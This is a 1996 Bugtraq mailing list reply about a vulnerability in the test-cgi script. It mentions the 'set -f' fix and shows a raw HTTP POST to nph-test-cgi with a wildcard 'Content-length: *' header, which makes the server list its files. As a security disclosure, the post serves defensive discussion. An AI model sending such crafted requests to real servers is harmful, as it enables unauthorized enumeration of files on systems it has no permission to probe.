Bugtraq mailing list archives
Re: Vulnerability in test-cgi
From: esi () ptc spbu ru (Evgene Ilyine)
Date: Tue, 17 Dec 1996 12:24:32 +0300
On Tue, 3 Dec 1996, Joe Zbiciak wrote:
string. Therefore it's still vulnerable in it's default configuration. Adding "set -f" as the second line of the script closes the hole completely.
Yes -- otherwise this hole would looks like a virus, here is anoter mutation: <esi@snark:~> (268) telnet localhost 80 Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. post /cgi-bin/nph-test-cgi http/1.0 Content-type: x Content-length: * .. skiped CONTENT_LENGTH = ( here you'll get a list of files) ============================================================= postmaster () spbu ru Evgene Ilyine http://www.ptc.spbu.ru/~esi Work phone:428-4527 =============================================================
Current thread:
- Re: Vulnerability in test-cgi Ed Arnold (Dec 03)
- Re: Vulnerability in test-cgi Joe Zbiciak (Dec 03)
- Re: Vulnerability in test-cgi Evgene Ilyine (Dec 17)
- vixie cron intel BSD exploit code Evgene Ilyine (Dec 17)
- sunos rlogin Roger Espel Llima (Dec 04)
- Re: Vulnerability in test-cgi Joe Zbiciak (Dec 03)